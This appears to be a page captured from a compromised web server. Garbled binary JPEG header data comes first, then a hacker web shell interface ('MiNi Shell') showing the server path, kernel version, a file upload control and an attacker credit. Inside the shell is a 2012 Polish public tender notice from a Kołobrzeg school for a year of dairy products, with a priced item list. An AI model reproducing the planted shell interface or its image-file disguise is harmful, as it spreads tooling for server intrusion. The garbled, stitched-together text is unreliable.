JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121206/494632-N-2012.html

<p class="kh_header"><b>Kołobrzeg: Dostawa artykułów spożywczych w grupie - Produkty mleczarskie - CPV 15500000-3</b><br>
<b>Numer ogłoszenia: 494632 - 2012; data zamieszczenia: 06.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ekonomiczno-Hotelarskich im. Emilii Gierczak , ul. Łopuskiego 13, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 0-94 35 115 55, faks 0-94 35 115 55.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych w grupie - Produkty mleczarskie - CPV 15500000-3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia zawiera załącznik  Nr 1 zestawienie asosrtymentowo ilościowie (w Exel) do SIWZ na stroni internetowej www.ekonom.kolobrzeg.pl w załączniku przetargi.
								
							Załącznik Nr 1	
	Zestawienie asortymentowo -ilościowe w grupie przetwory mleczarskie							
								
L.P.	          Nazwa  towaru	nazwa handlowa towaru	  J.m.	  Ilość	     Cena	  Wartość	    Vat	     Wartość
					    jednost.	    netto	     %	       brutto
					      netto			
								
1	Jogurt 0,150 g.szt. Naturalny		szt	50	0,49 zł	24,50 zł	1,08	26,46 zł
2	Jogurt 0,400 g.szt. Zott lub równoważne		szt	700	1,65 zł	1 155,00 zł	1,08	1 247,40 zł
3	Jogurt 0,150 g.szt owocowy Jogobella lub równoważne		szt	1500	0,55 zł	825,00 zł	1,08	891,00 zł
4	Jogurt 0,340 g.szt owocowy		szt	1500	1,46 zł	2 190,00 zł	1,08	2 365,20 zł
5	Jogurt 0,330 g.szt owocowy pitny		szt	1100	1,26 zł	1 386,00 zł	1,08	1 496,88 zł
6	Masło 82% 0,200 kg.szt		szt	4000	3,20 zł	12 800,00 zł	1,08	13 824,00 zł
7	Masło roślinne 0,200 kg.szt		szt	25	1,10 zł	27,50 zł	1,08	29,70 zł
8	Margaryna Kasia lub równoważne 0,250 kg.szt		szt	700	2,15 zł	1 505,00 zł	1,08	1 625,40 zł
9	Margaryna zwykła 0,250 kg/szt		szt	400	1,28 zł	512,00 zł	1,08	552,96 zł
10	Mleko spożywcze 2%		l	10	1,37 zł	13,70 zł	1,05	14,39 zł
11	Mleko UHT 2% 1 l		l	10	1,92 zł	19,20 zł	1,05	20,16 zł
12	Mleko UHT 3,2%		l	2500	1,97 zł	4 925,00 zł	1,05	5 171,25 zł
13	Mleko UHT 0,5%		l	10	2,47 zł	24,70 zł	1,05	25,94 zł
14	Mleko w proszku 0,500 kg.szt		szt	3	7,14 zł	21,42 zł	1,08	23,13 zł
15	Śmietana 18% wiadro 5l		szt	120	21,33 zł	2 559,60 zł	1,08	2 764,37 zł
16	Śmietana 18% 0,180g		szt	10	0,88 zł	8,80 zł	1,08	9,50 zł
17	Śmietana 12% 0,375g		szt	10	1,67 zł	16,70 zł	1,08	18,04 zł
18	Śmietana 30% wiadro 5l		szt	5	36,62 zł	183,10 zł	1,08	197,75 zł
19	Śmietana 30% folia 5l		szt	2	36,62 zł	73,24 zł	1,08	79,10 zł
20	Śmietana 30% karton 0,200 l		szt	10	2,29 zł	22,90 zł	1,08	24,73 zł
21	Śmietana 36% karton 0,500 l		szt	20	4,85 zł	97,00 zł	1,08	104,76 zł
22	Śmietana 36% karton 0,200 l		szt	10	2,56 zł	25,60 zł	1,08	27,65 zł
23	Śmietana 36% karton 1 l		szt	800	8,33 zł	6 664,00 zł	1,08	7 197,12 zł
24	Śmietana 18% 0,370 l		szt	100	1,79 zł	179,00 zł	1,08	193,32 zł
25	śmietana 36 wiadro 5l lub folia		szt	50	34,70 zł	1 735,00 zł	1,08	1 873,80 zł
26	Śmietanka do kawy jednoporcjowa 10*10 g. 1 op.		op	500	1,24 zł	620,00 zł	1,08	669,60 zł
27	Ser żółty twardy z ziołami		kg	20	15,56 zł	311,20 zł	1,08	336,10 zł
28	Ser żółty twardy wędzony		kg	50	14,28 zł	714,00 zł	1,08	771,12 zł
30	Ser żółty twardy Podlaski,Edamski, Morski, Mazdamer, Kasztelański, Gouda		kg	600	14,46 zł	8 676,00 zł	1,08	9 370,08 zł
31	Ser feta 0,270 kg.szt		szt	130	2,88 zł	374,40 zł	1,08	404,35 zł
32	Ser brie 0,20 kg.szt		szt	200	5,13 zł	1 026,00 zł	1,08	1 108,08 zł
33	Ser cammembert 0,120 kg.szt		szt	150	2,88 zł	432,00 zł	1,08	466,56 zł
34	Ser cammembert 0,180 kg.szt		szt	700	5,13 zł	3 591,00 zł	1,08	3 878,28 zł
35	Ser plastry hochland 0,150 kg.szt lub równoważne		szt	590	2,93 zł	1 728,70 zł	1,08	1 867,00 zł
36	Ser zegar hochland 0,20 kg.szt lub równoważne		szt	600	3,84 zł	2 304,00 zł	1,08	2 488,32 zł
37	Ser tartare 0,020 kg.szt		szt	1300	0,43 zł	559,00 zł	1,08	603,72 zł
38	Ser fromage mix 0,075 kg		szt	800	0,96 zł	768,00 zł	1,08	829,44 zł
39	Ser bloczki hochland 0,10 kg.szt lub równoważne		szt	400	1,74 zł	696,00 zł	1,08	751,68 zł
40	Ser topiony zwykły 0,10 kg.szt		szt	100	0,87 zł	87,00 zł	1,08	93,96 zł
41	Twarożek owocowy 0,125 kg.szt		szt	1500	0,92 zł	1 380,00 zł	1,08	1 490,40 zł
42	Serek owocowy homogenizowany 0,150 kg.szt		szt	1500	1,01 zł	1 515,00 zł	1,08	1 636,20 zł
43	Deser Monte 4x 62,5 g.szt  lub równoważne		szt	150	4,21 zł	631,50 zł	1,08	682,02 zł
44	Sernik na zimno 0,160 kg.szt		szt	20	1,10 zł	22,00 zł	1,08	23,76 zł
45	Galaretka owocowa 0,150 kg.szt		szt	10	0,78 zł	7,80 zł	1,08	8,42 zł
46	Serek wiejski 0,150 kg.szt		szt	700	1,56 zł	1 092,00 zł	1,08	1 179,36 zł
47	Kefir 0,400 l.szt		szt	10	1,28 zł	12,80 zł	1,08	13,82 zł
48	Twaróg półtłusty krajanka		kg	350	7,32 zł	2 562,00 zł	1,08	2 766,96 zł
49	Twaróg półtłusty kostka 0,200 kg/szt		szt	1500	7,55 zł	11 325,00 zł	1,08	12 231,00 zł
50	Twaróg śmietankowy wiadro 1 kg		szt	5	8,88 zł	44,40 zł	1,08	47,95 zł
51	Twaróg śmietankowy wiadro 0,5 kg		szt	5	5,04 zł	25,20 zł	1,08	27,22 zł
52	Twaróg waniliowy 0,50 kg		szt	5	5,04 zł	25,20 zł	1,08	27,22 zł
53	Drożdże spożywcze 0,100 kg/szt		szt	100	0,67 zł	67,00 zł	1,23	82,41 zł
54	serek almmete 0.150g		szt	100	3,34 zł	334,00 zł	1,08	360,72 zł
55	jogurt naturalny 0.40l		szt	1000	1,74 zł	1 740,00 zł	1,08	1 879,20 zł
	aktimel op 4 szt		szt	100	4,49 zł	449,00 zł	1,08	484,92 zł
	margaryna delma 05 kg		szt	220	2,15 zł	473,00 zł	1,08	510,84 zł
	ser mascarpone 250g		szt	50	4,67 zł	233,50 zł	1,08	252,18 zł
	ser twardy marmurkowy kg		kg	100	18,13 zł	1 813,00 zł	1,08	1 958,04 zł
	wartość  razem					83 993,66 zł		90 573,72 zł.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do 20%</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
 [o]  działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.
2)	 posiadania wiedzy i doświadczenia,
 Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga posiadania Certyfikatu lub zaświadczenie potwierdzające wprowadzenie systemu bezpieczeństwa żywnościowego HACCP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia: Wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 3 dostaw okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców                                                                                                                                                      
 [ ]   opis warunków udziału w zakresie wiedzy i doświadczenia
3)	 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>)  dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego  potwierdzających odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat  lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ekonom.kolobrezg.pl (zakładka -przetargi + link z BIP); zsehkolobrzeg.finn.pl (zakładka przetarg<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul.Łopuskiego 13, 78-100 Kołobrzeg pok. 114.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2012 godzina 09:00, miejsce: Łopuskiego 13, Kołobrzeg pok. 114.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com